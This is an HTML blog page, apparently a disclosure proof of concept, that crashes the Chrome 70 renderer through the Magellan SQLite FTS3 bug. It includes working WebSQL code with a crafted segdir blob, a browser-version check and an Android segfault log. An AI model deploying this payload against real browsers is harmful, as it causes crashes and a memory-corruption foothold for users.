· 7 years ago · Feb 21, 2019, 02:12 PM
1<!---
2title: Crash Chrome 70 with the SQLite Magellan bug
3categories: chrome
4permalink: /sqlitebug/
5layout: post
6---!>
7
8<p>This proof-of-concept crashes the Chrome renderer process using <a href="https://blade.tencent.com/magellan/index_en.html">Tencent Blade Team's Magellan SQLite3 bug</a>. It's based on <a href="https://www.sqlite.org/src/info/940f2adc8541a838">a SQLite test case</a> from the commit that fixed the bug.</p>
9
10<p><span id="prompttext">If you're using Chrome 70 or below, tap the button below to crash this page:</span></p>
11<button onClick="crash()" style="font-size: 150%">Crash this page</button>
12<p>Your browser's user agent is: <span id="browserUserAgent">not available without JavaScript. Turn it on!</span></p>
13
14<p><a href="https://github.com/zhuowei/worthdoingbadly.com/blob/master/_posts/2018-12-14-sqlitebug.html">Source code for this page on GitHub</a>.</p>
15
16<h1>Sign up for more information</h1>
17<p>I'm working on understanding how this issue affects browsers. To get notified when I update this page, please sign up to my mailing list:</p>
18<form action="https://worthdoingbadly.us18.list-manage.com/subscribe/post?u=3f9820ca33ce6a7b1e682c9ac&id=014e6793b7&SIGNUP=inline-sqlitebug" method="post" id="mc-embedded-subscribe-form-inline" name="mc-embedded-subscribe-form-inline" class="validate" target="_blank">
19 <input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL" placeholder="Email">
20 <div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_3f9820ca33ce6a7b1e682c9ac_014e6793b7" tabindex="-1" value=""></div>
21 <input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button">
22</form>
23
24<h1>What's supposed to happen?</h1>
25<p>After you press the button, the page should crash:</p>
26<p><img src="/assets/blog/sqlitebug/sqlite_cropped.png" alt="screenshot"></p>
27<p>On Android 5.1, I get a segfault in memcpy:</p>
28<pre style="font-size: 10px">
29 F/libc ( 3801): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe0ddb457 in tid 3854 (Database thread)
30 I/DEBUG ( 142): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
31 I/DEBUG ( 142): Build fingerprint: 'google/nakasi/grouper:5.1/LMY47D/1743759:user/release-keys'
32 I/DEBUG ( 142): Revision: '0'
33 I/DEBUG ( 142): ABI: 'arm'
34 I/DEBUG ( 142): pid: 3801, tid: 3854, name: Database thread >>> com.android.chrome:sandboxed_process6 <<<
35 I/DEBUG ( 142): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe0ddb457
36 I/DEBUG ( 142): r0 e0ddb457 r1 611be0ab r2 00000002 r3 ff000000
37 I/DEBUG ( 142): r4 611be038 r5 00000002 r6 611be0a9 r7 7fffffff
38 I/DEBUG ( 142): r8 00000001 r9 611be0ab sl 80000001 fp 00000000
39 I/DEBUG ( 142): ip 00000066 sp 6defd3a0 lr 00000074 pc 4025eb62 cpsr 680f2430
40 I/DEBUG ( 142):
41 I/DEBUG ( 142): backtrace:
42 I/DEBUG ( 142): #00 pc 0000fb62 /system/lib/libc.so (__memcpy_base+217)
43 I/DEBUG ( 142): #01 pc 018d0e1d /data/app/com.android.chrome-1/base.apk
44</pre>
45
46<h1>What's affected?</h1>
47<p>Affected: tested, causes one tab/one window to crash:</p>
48<ul>
49 <li>Chrome 70.0.3538.110 on Android 5.1 and 9</li>
50 <li>Electron 2.0.12 on macOS 10.14</li>
51</ul>
52<p>Not affected:</p>
53<ul>
54 <li>Chrome 71.0.3578.98 on Android 8.1 (already fixed)</li>
55 <li>Safari (doesn't have FTS enabled in SQLite3)</li>
56 <li>Browsers not based on Chrome (no WebSQL support)</li>
57</ul>
58
59<script>
60// https://gist.github.com/nolanlawson/0264938033aca2201012
61// https://www.sqlite.org/src/info/940f2adc8541a838
62const db = openDatabase('fts_demo', 1, 'fts_demo', 5000000);
63
64const firstStatements = [
65"DROP TABLE IF EXISTS ft;",
66"CREATE VIRTUAL TABLE ft USING fts3;",
67"INSERT INTO ft VALUES('aback');",
68"INSERT INTO ft VALUES('abaft');",
69"INSERT INTO ft VALUES('abandon');",
70];
71
72const secondStatements = [
73"SELECT quote(root) from ft_segdir;",
74"UPDATE ft_segdir SET root = X'0005616261636B03010200FFFFFFFF070266740302020003046E646F6E03030200';",
75"SELECT * FROM ft WHERE ft MATCH 'abandon';"
76];
77
78function dbSuccess() {
79 console.log("success");
80 console.log(arguments);
81}
82
83function dbErr() {
84 console.log("err");
85 console.log(arguments);
86}
87
88function runAll(statements, success) {
89 db.transaction((tx) => {
90 console.log("alive");
91 for (const statement of statements) {
92 console.log("queueing " + statement);
93 tx.executeSql(statement, [], dbSuccess, dbErr);
94 }
95 console.log("queued");
96 }, dbErr, success);
97}
98function crash() {
99 runAll(firstStatements, (event) => {
100 console.log(event);
101 runAll(secondStatements, (event) => {
102 console.log(event);
103 });
104 });
105}
106// onload
107function getChromeVersion(userAgent) {
108 for (const part of userAgent.split(" ")) {
109 if (part.startsWith("Chrome/") || part.startsWith("Chromium/")) {
110 return part.substring(part.indexOf("/") + 1);
111 }
112 }
113 return null;
114}
115function isChromeSupported(chromeVersion) {
116 if (chromeVersion == null) return false;
117 const firstPart = chromeVersion.substring(0, chromeVersion.indexOf("."));
118 return parseInt(firstPart) <= 70;
119}
120function getPromptText(userAgent) {
121 const chromeVersion = getChromeVersion(userAgent);
122 if (chromeVersion == null) {
123 return "This demo only works on Chrome 70 or below. Open this page in Chrome 70, then tap the button.";
124 }
125 const chromeOK = isChromeSupported(chromeVersion);
126 if (chromeOK) {
127 return "You're using Chrome 70 or below, so you may be vulnerable. Tap the button to crash this page.";
128 }
129 return "Your Chrome is too new. Open this page in Chrome 70, then tap the button.";
130}
131function onLoad() {
132 document.getElementById("browserUserAgent").textContent = navigator.userAgent;
133 document.getElementById("prompttext").textContent = getPromptText(navigator.userAgent);
134}
135window.onload = onLoad;
136</script>